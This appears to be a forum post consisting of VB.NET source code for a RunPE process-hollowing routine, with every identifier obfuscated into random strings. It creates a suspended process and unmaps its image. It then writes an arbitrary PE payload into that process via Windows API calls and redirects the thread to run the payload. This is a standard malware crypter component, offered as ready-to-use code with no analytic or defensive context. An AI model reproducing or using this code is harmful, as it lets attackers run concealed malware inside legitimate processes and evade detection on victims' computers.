Code:' Function to Call RunPE is : nTFHDHWFgaoSbRwwbvQbG Imports System.Runtime.InteropServices Imports System.ComponentModel Public Class oOuvQpqDXVEKcjKNMEVuK Public Const KYNKQAfIHOmeKwdAPZFvW As Long = &H200 Public Const GvPgmDqltaJnZliRncoRo As Long = &H40 Public Const ZIgrlMfrdTqKHAFDqBYRD As Long = &H80 Public Const UfiQKPrXTeNTWmKUQEKlV As Long = &H20 Public Const opBbKYgcDYvnDCdGTZrlg As Long = &H10 Public Const KBSnJhVhkRfKiOApWvbls As Long = &H8 Public Const FZTMfjgOacCTADEJuBNHN As Long = &H1 Public Const YikXfsVTKVjneQYtAWuIZ As Long = &H4 Public Const UJmtDvgAAhHwtFdMYZfbr As UInt32 = &H2 Shared Sub nTFHDHWFgaoSbRwwbvQbG(ByVal JcWTDQLKQTYmIeTieTAcR() As Byte, ByVal FDYpYSWoGfsvYTYCFWjvk As String) Dim YMoDYbLtnYcSFgrlIsTvv = New UkqZueWadjAbUVwFfvESQ.ntJltnMfNdhvChSoiTmSc, JGawtwBkuWRSgumblpWSo As UkqZueWadjAbUVwFfvESQ.FecVSCMRkhlbvjrsMsHmJ, YnsgRLBWTaWvdvNePQpmV = New UkqZueWadjAbUVwFfvESQ.UOuFnNMCJmqHskSvnTaIn, nXNRnWBIqfabZAmhqpKJB = New UkqZueWadjAbUVwFfvESQ.JhecmfoNaYKuHMITtNsJN, FHgBLiCqQkfGWBNkTQdcf = New UkqZueWadjAbUVwFfvESQ.YRwNLrowAdPaEOgXXmNdr, UpBigtCcnojjTDloupwwM = New UkqZueWadjAbUVwFfvESQ.YRwNLrowAdPaEOgXXmNdr Dim nBSugFohXhTGAPIaANgwY = GCHandle.Alloc(JcWTDQLKQTYmIeTieTAcR, GCHandleType.Pinned) Dim JKiIgOemGbDafcbMDjRAj As Integer = nBSugFohXhTGAPIaANgwY.AddrOfPinnedObject.ToInt32 Dim FikeERpTtmYjuRgdbmCTF As New UkqZueWadjAbUVwFfvESQ.YsDqEaeYdfIGbeDPeKjTQ FikeERpTtmYjuRgdbmCTF = Marshal.PtrToStructure(nBSugFohXhTGAPIaANgwY.AddrOfPinnedObject, FikeERpTtmYjuRgdbmCTF.GetType) nBSugFohXhTGAPIaANgwY.Free() If UkqZueWadjAbUVwFfvESQ.CreateProcess(Nothing, FDYpYSWoGfsvYTYCFWjvk, FHgBLiCqQkfGWBNkTQdcf, UpBigtCcnojjTDloupwwM, False, 4, Nothing, Nothing, nXNRnWBIqfabZAmhqpKJB, YnsgRLBWTaWvdvNePQpmV) = 0 Then Return Dim USFPadpFTrcPqTHgFNVmi As New UkqZueWadjAbUVwFfvESQ.ncWaZleKDkMjYfbSIjFnu USFPadpFTrcPqTHgFNVmi = Marshal.PtrToStructure(New IntPtr(JKiIgOemGbDafcbMDjRAj + FikeERpTtmYjuRgdbmCTF.JlmlZuTPkduGFsuFLHmnJ), USFPadpFTrcPqTHgFNVmi.GetType) Dim JlmlZuTPkduGFsuFLHmnJ, FMoKvAftapRPVhCWiKYJb As Long, YVIWuJUBKiBiCtWIlgIKn As UInteger nXNRnWBIqfabZAmhqpKJB.TtJsTMffAtVrRibZMjrdI = Len(nXNRnWBIqfabZAmhqpKJB) YMoDYbLtnYcSFgrlIsTvv.nGaGTVUkgmFOwvuLPHbdT = 65538 If USFPadpFTrcPqTHgFNVmi.JPqSSdJpQgnidKRuSdLef <> 17744 Or FikeERpTtmYjuRgdbmCTF.EnsnogUWGrKrswVOqguAA <> 23117 Then Return If UkqZueWadjAbUVwFfvESQ.GetThreadContext(YnsgRLBWTaWvdvNePQpmV.YwMCopKbnkrOaMpBtEeAM, YMoDYbLtnYcSFgrlIsTvv) And UkqZueWadjAbUVwFfvESQ.ReadProcessMemory(YnsgRLBWTaWvdvNePQpmV.TXNYMsVHdwOXpBuSUHQUe, YMoDYbLtnYcSFgrlIsTvv.mgejMEKNNpwrWNQEXdAUq + 8, JlmlZuTPkduGFsuFLHmnJ, 4, 0) >= 0 And UkqZueWadjAbUVwFfvESQ.ZwUnmapViewOfSection(YnsgRLBWTaWvdvNePQpmV.TXNYMsVHdwOXpBuSUHQUe, JlmlZuTPkduGFsuFLHmnJ) >= 0 Then Dim IqvvMNwSuigOEaknaChUE As UInt32 = UkqZueWadjAbUVwFfvESQ.VirtualAllocEx(YnsgRLBWTaWvdvNePQpmV.TXNYMsVHdwOXpBuSUHQUe, USFPadpFTrcPqTHgFNVmi.ERwUhPKvktDXTPpHAEToX.XaQfhYAETnkrBbLqDaDoi, USFPadpFTrcPqTHgFNVmi.ERwUhPKvktDXTPpHAEToX.TBSEGbLhJBIDQRQKbdlKD, 12288, 4) If IqvvMNwSuigOEaknaChUE <> 0 Then UkqZueWadjAbUVwFfvESQ.WriteProcessMemory(YnsgRLBWTaWvdvNePQpmV.TXNYMsVHdwOXpBuSUHQUe, IqvvMNwSuigOEaknaChUE, JcWTDQLKQTYmIeTieTAcR, USFPadpFTrcPqTHgFNVmi.ERwUhPKvktDXTPpHAEToX.mKiPFkAmqrpWudjueCWLP, YVIWuJUBKiBiCtWIlgIKn) FMoKvAftapRPVhCWiKYJb = FikeERpTtmYjuRgdbmCTF.JlmlZuTPkduGFsuFLHmnJ + 248 For IUCbFtmralZqcqGghXGLb As Integer = 0 To USFPadpFTrcPqTHgFNVmi.ErDAbwAYQwtCrfLAIaoet.XEULaHmdApdWYrejLwZfI - 1 JGawtwBkuWRSgumblpWSo = Marshal.PtrToStructure(New IntPtr(JKiIgOemGbDafcbMDjRAj + FMoKvAftapRPVhCWiKYJb + IUCbFtmralZqcqGghXGLb * 40), JGawtwBkuWRSgumblpWSo.GetType) Dim TcWhwKBKnEBfngjDiCKBa(JGawtwBkuWRSgumblpWSo.mlmswTnPXuiCVtGmlXsBl) As Byte For IuGHvccUGnSWCIZYptcBA As Integer = 0 To JGawtwBkuWRSgumblpWSo.mlmswTnPXuiCVtGmlXsBl - 1 : TcWhwKBKnEBfngjDiCKBa(IuGHvccUGnSWCIZYptcBA) = JcWTDQLKQTYmIeTieTAcR(JGawtwBkuWRSgumblpWSo.EVIdUfnBtBmfSuepPwNVS + IuGHvccUGnSWCIZYptcBA) : Next UkqZueWadjAbUVwFfvESQ.WriteProcessMemory(YnsgRLBWTaWvdvNePQpmV.TXNYMsVHdwOXpBuSUHQUe, IqvvMNwSuigOEaknaChUE + JGawtwBkuWRSgumblpWSo.JlmlZuTPkduGFsuFLHmnJ, TcWhwKBKnEBfngjDiCKBa, JGawtwBkuWRSgumblpWSo.mlmswTnPXuiCVtGmlXsBl, YVIWuJUBKiBiCtWIlgIKn) UkqZueWadjAbUVwFfvESQ.VirtualProtectEx(YnsgRLBWTaWvdvNePQpmV.TXNYMsVHdwOXpBuSUHQUe, IqvvMNwSuigOEaknaChUE + JGawtwBkuWRSgumblpWSo.JlmlZuTPkduGFsuFLHmnJ, JGawtwBkuWRSgumblpWSo.XfYoUocGdsXCwKAcSUvVe.mlmswTnPXuiCVtGmlXsBl, TFaNpqnkTGrLOwFtqXgow(JGawtwBkuWRSgumblpWSo.nGaGTVUkgmFOwvuLPHbdT), JlmlZuTPkduGFsuFLHmnJ) Next IUCbFtmralZqcqGghXGLb Dim mPqZpCdpDwbftLZfttQpL = BitConverter.GetBytes(IqvvMNwSuigOEaknaChUE) UkqZueWadjAbUVwFfvESQ.WriteProcessMemory(YnsgRLBWTaWvdvNePQpmV.TXNYMsVHdwOXpBuSUHQUe, YMoDYbLtnYcSFgrlIsTvv.mgejMEKNNpwrWNQEXdAUq + 8, mPqZpCdpDwbftLZfttQpL, 4, YVIWuJUBKiBiCtWIlgIKn) YMoDYbLtnYcSFgrlIsTvv.IYKkoLSukqLBaYsRwRBpW = IqvvMNwSuigOEaknaChUE + USFPadpFTrcPqTHgFNVmi.ERwUhPKvktDXTPpHAEToX.JlmlZuTPkduGFsuFLHmnJ UkqZueWadjAbUVwFfvESQ.SetThreadContext(YnsgRLBWTaWvdvNePQpmV.YwMCopKbnkrOaMpBtEeAM, YMoDYbLtnYcSFgrlIsTvv) UkqZueWadjAbUVwFfvESQ.ResumeThread(YnsgRLBWTaWvdvNePQpmV.YwMCopKbnkrOaMpBtEeAM) End If End If End Sub Private Shared Function EwMJNOdbaEfKpNAiXUjLp(ByVal TgeqjZdMwIknmPYlAtFfV As Long, ByVal XIcUNXSgKuQeXZUUaqTMD As Long) As Long EwMJNOdbaEfKpNAiXUjLp = mqvFiiTSgCUKTbsYDRmfh(TgeqjZdMwIknmPYlAtFfV) / (2 ^ XIcUNXSgKuQeXZUUaqTMD) End Function Private Shared Function mqvFiiTSgCUKTbsYDRmfh(ByVal ICOQirIXQsEeBoOKGnWgt As Long) As Double Const EaQmHuTDGGZnQdTbeqICO = 4294967296.0# If ICOQirIXQsEeBoOKGnWgt < 0 Then mqvFiiTSgCUKTbsYDRmfh = ICOQirIXQsEeBoOKGnWgt + EaQmHuTDGGZnQdTbeqICO Else mqvFiiTSgCUKTbsYDRmfh = ICOQirIXQsEeBoOKGnWgt End If End Function Private Shared Function TFaNpqnkTGrLOwFtqXgow(ByVal XjgAGGIJnAJKvpnNhOpCa As Long) As Long Dim SKiWcJTmdLdTNeseIRbWs() As Object = {FZTMfjgOacCTADEJuBNHN, opBbKYgcDYvnDCdGTZrlg, UJmtDvgAAhHwtFdMYZfbr, UfiQKPrXTeNTWmKUQEKlV, YikXfsVTKVjneQYtAWuIZ, GvPgmDqltaJnZliRncoRo, YikXfsVTKVjneQYtAWuIZ, YikXfsVTKVjneQYtAWuIZ} TFaNpqnkTGrLOwFtqXgow = SKiWcJTmdLdTNeseIRbWs(EwMJNOdbaEfKpNAiXUjLp(XjgAGGIJnAJKvpnNhOpCa, 29)) End Function <EditorBrowsable(1)> Friend Class UkqZueWadjAbUVwFfvESQ <StructLayout(0)> Structure ntJltnMfNdhvChSoiTmSc Dim nGaGTVUkgmFOwvuLPHbdT, mTCibRIrNENnrrOQLnLWG, IdStbavwuuuJZGiDOLsWS, DDUSAdJdjJSTosmTmOeqk, XNkewmviTCCmVIJGpkOqw, SlmCVpJPJNWvkuOXPnAMR, luGOVBvUqHGSSJhJSLhMd As UInt32, IGWZUKlZaAomwWEsVhRNo As IGWZUKlZaAomwWEsVhRNo Dim DeYvqMwGQLLvPLJMtkDgJ, WopKqVlLAFsStXcvwIkgV, SOqgPYwpnQPbLMhPXLWDn, lYKrOhluWJAvqZDCahGDC, HhaFOqaCGChSXmXldFnDO, DIcbjsmgtOEbmbcFDIZXg, mgejMEKNNpwrWNQEXdAUq, WRtnjEbldHluUnvoGeJXr, SpvMIHmRTSIHjcDIehrqN, IYKkoLSukqLBaYsRwRBpW, lCOXHQbXDMqaQpXrhFcrY, HLfjHZQckFauvEqekbMrk, DjgHdcbIaQuGNqvuLeuNF, WsATckROJJeasGRhOCfOR, STCpBncrwVCjKsWBmFQhj, lcSDBwRwgOjGoHqkpbAhv As UInt32 <MarshalAs(UnmanagedType.ByValArray, SizeConst:=512)> Dim HmjPAIGEQHTaWUMWswiiJ As Byte() End Structure <StructLayout(0)> Structure IGWZUKlZaAomwWEsVhRNo Dim DNklWLRiGTnjlJRnSCTEb, WWEwWUHnnMXGSVlZVYEEn, SuGVrWSUdXsPhKpqtbmYI, lGWgrfHZNRciPXMdwwWYU, HQnsrotetKMFtkfPCVHYg, DnpRPrHLjVgOMZkgaYprB, WAIcPDtQTORiqlHSduZsM As UInteger <MarshalAs(UnmanagedType.ByValArray, SizeConst:=80)> Dim RYKBlFIuJalrIaMjDwLOf As Byte() Dim lhaMkOuCqTVOnnfVHVsOq As UInt32 End Structure Structure XfYoUocGdsXCwKAcSUvVe Dim JlmlZuTPkduGFsuFLHmnJ, mlmswTnPXuiCVtGmlXsBl As UInt32 End Structure Structure FecVSCMRkhlbvjrsMsHmJ Dim HqrYkXjHaMFiUCCIKrcPF As Byte, XfYoUocGdsXCwKAcSUvVe As XfYoUocGdsXCwKAcSUvVe, JlmlZuTPkduGFsuFLHmnJ, mlmswTnPXuiCVtGmlXsBl, EVIdUfnBtBmfSuepPwNVS, CRtuJaulQYarjoGYhuOiX, WbMIIjjqARKOREaLkSvij, RBOeemuWnceXgqfcLVhFE, kLfqevkcWVOrNFBOOrRFQ, nGaGTVUkgmFOwvuLPHbdT As UInt32 End Structure Structure UOuFnNMCJmqHskSvnTaIn Dim TXNYMsVHdwOXpBuSUHQUe, YwMCopKbnkrOaMpBtEeAM As IntPtr, HUvEdGZhGPvNsSVARPBFb, CsAaCJkNtaTWKHaRpSkZt As Integer End Structure <StructLayout(0, CharSet:=3)> Structure JhecmfoNaYKuHMITtNsJN Dim TtJsTMffAtVrRibZMjrdI As Integer, VEQlCSZTdTDqpTtDsoUZI, RcSKXVkwTfXCHIBUSrGsa, kmjWXeaEDYHWlVUHVPntm As String, GvChXnPJkRpqTioqYlXtB, IuGHvccUGnSWCIZYptcBA, CWEGspanZdMCiXtKwoJPT, VfURsBPsJWtWPjPtCMqQe, RGWnREaZwhQfeYUNaPcjA, kPnCQNPegaACMlowdlMjL, GZGNQWFjQUiWqAKjgJtkX, nGaGTVUkgmFOwvuLPHbdT As Integer Dim CAIjmYQQGfFfJmPCHMfGp, VJZvlhFVnYmBnCimKiPGE As Short, RhaTKkQCdkJKFonGhlAZW, kqrfKtFHMdrekDKpkJiai, GDKqJFsMtWbBRQdbnfSat, CaMPfIGqjhvKgFisOiDtO As Integer End Structure <StructLayout(0)> Structure YRwNLrowAdPaEOgXXmNdr Dim VkdbfRsvTbfeORFeRGlua As Integer, RLfADTGbJmDndGJvpJWQs As IntPtr, kUvLDcshqfkKKTdisfGQH As Integer End Structure <StructLayout(0)> Structure YsDqEaeYdfIGbeDPeKjTQ Dim EnsnogUWGrKrswVOqguAA, GdPWDlhmaZUepgwUvDoRT, CEQsYotSQkonHVElVGZkl, mwqbjwqZvYOimAiXLYfuG, mlmswTnPXuiCVtGmlXsBl, IIJniIfefSvETNEJOtPuR, EgLLHKqLVdTNiCJamwBRj, lcSDBwRwgOjGoHqkpbAhv, XpcXHTgQFWDhQOcMpViRv, qCsiGcVVmPkEubwwsrSRK, mZuHcfgCcbHNMQEPTtEkc, IjOTcoVHMUohrcXCWSllo, EKPpBrgkCfMqJRcTtVWHJ, XTgDACWqiZtNnewFwrHHU As UInt16 <MarshalAs(UnmanagedType.ByValArray, SizeConst:=4)> Dim VEQlCSZTdTDqpTtDsoUZI As UInt16() Dim qcwOALLvSSdhVqSoCPoIg, mDBkWOWbIdAqkfXIaSZbB As UInt16 <MarshalAs(UnmanagedType.ByValArray, SizeConst:=10)> Dim VJZvlhFVnYmBnCimKiPGE As UInt16() Dim JlmlZuTPkduGFsuFLHmnJ As Int32 End Structure Structure ncWaZleKDkMjYfbSIjFnu Dim JPqSSdJpQgnidKRuSdLef As UInt32, ErDAbwAYQwtCrfLAIaoet As INSwVXLgpWhNSsqrdoKbN, ERwUhPKvktDXTPpHAEToX As EkTVraWNfiFWhhvLErsvf End Structure <StructLayout(0)> Structure INSwVXLgpWhNSsqrdoKbN Dim XukgqjLSPbmpOtSvHPcvr, XEULaHmdApdWYrejLwZfI As UInt16, qGDsqsBXwUWMtJlhKlNvF, EKPpBrgkCfMqJRcTtVWHJ, meFQPuMEmgqVLvqBhovSY As UInt32, mlmswTnPXuiCVtGmlXsBl, nGaGTVUkgmFOwvuLPHbdT As UInt16 End Structure <StructLayout(0)> Structure EkTVraWNfiFWhhvLErsvf Public EnsnogUWGrKrswVOqguAA As UInt16, InWcOGBJVZbppKNkkMgSj, EOYBkJMnLkvBHARELPRlE As Byte, XXoMkSBssefVmMlnOlBmQ, qhIYjbnAcXPpTZHaRJjmc, mIJuIdCeSikBjOMqpMUIu, JlmlZuTPkduGFsuFLHmnJ, IRaIImojCbUVQagdsiEJJ, JcWTDQLKQTYmIeTieTAcR, XaQfhYAETnkrBbLqDaDoi As UInt32, EpcedpCQpnoefPluTlncb, XBspdBoVZgYBNcHgWJXcm As UInt32 Public qLMEdKdaIZIUrobSZfHdB, miOaBNpHvlddJdfjwiqwT, IselBVeMfeNAoqCVCGawf, DTgKXYppVphJGfHmaJMSA, XcwWWhevFiRdkraZdftTM, qlQhWqTDmcCASHuLgDdTX As UInt16, lMSGstegcnWJhtCcHGPmq, TBSEGbLhJBIDQRQKbdlKD, mKiPFkAmqrpWudjueCWLP, qCsiGcVVmPkEubwwsrSRK As UInt32, IWiRrFUlMgGdPIVOKcwnE, nGaGTVUkgmFOwvuLPHbdT As UInt16 Public DtknQHfSCsamevafhfiJW, WGDCQQUXilLJLKtRlDSJi, pPUNPZJcSescqXQEoZCKu, lnWjlcUJIqPmIMVUOcldP, HwmullKOpjwImYoHRAVdb, DXoTJnVsfuTRENtYpDGAt As UInt32 <MarshalAs(UnmanagedType.ByValArray, SizeConst:=16)> Public WhIfJwKAPnEljaQKsZoAH As WhIfJwKAPnEljaQKsZoAH() End Structure <StructLayout(0)> Structure WhIfJwKAPnEljaQKsZoAH Dim JlmlZuTPkduGFsuFLHmnJ, mlmswTnPXuiCVtGmlXsBl As UInt32 End Structure Declare Auto Function CreateProcess Lib "kernel32" (ByVal name As String, ByVal command As String, ByRef process As YRwNLrowAdPaEOgXXmNdr, ByRef thread As YRwNLrowAdPaEOgXXmNdr, ByVal inherit As Boolean, ByVal flags As UInt32, ByVal system As IntPtr, ByVal current As String, <[In]()> ByRef startup As JhecmfoNaYKuHMITtNsJN, <Out()> ByRef info As UOuFnNMCJmqHskSvnTaIn) As Boolean Declare Auto Function WriteProcessMemory Lib "kernel32" (ByVal process As IntPtr, ByVal address As IntPtr, ByVal buffer As Byte(), ByVal size As IntPtr, <Out()> ByRef written As Integer) As Boolean Declare Auto Function ReadProcessMemory Lib "kernel32" (ByVal process As IntPtr, ByVal address As IntPtr, ByRef buffer As IntPtr, ByVal size As IntPtr, ByRef read As Integer) As Integer Declare Auto Function VirtualProtectEx Lib "kernel32" (ByVal process As IntPtr, ByVal address As IntPtr, ByVal size As UIntPtr, ByVal [new] As UIntPtr, <Out()> ByVal old As UInt32) As Integer Declare Auto Function VirtualAllocEx Lib "kernel32" (ByVal process As IntPtr, ByVal address As IntPtr, ByVal size As UInt32, ByVal type As UInt32, ByVal protect As UInt32) As IntPtr Declare Auto Function ZwUnmapViewOfSection Lib "ntdll" (ByVal process As IntPtr, ByVal address As IntPtr) As Long Declare Auto Function ResumeThread Lib "kernel32" (ByVal thread As IntPtr) As UInt32 Declare Auto Function GetThreadContext Lib "kernel32" (ByVal thread As IntPtr, ByRef context As ntJltnMfNdhvChSoiTmSc) As Boolean Declare Auto Function SetThreadContext Lib "kernel32" (ByVal thread As IntPtr, ByRef context As ntJltnMfNdhvChSoiTmSc) As Boolean End Class End Class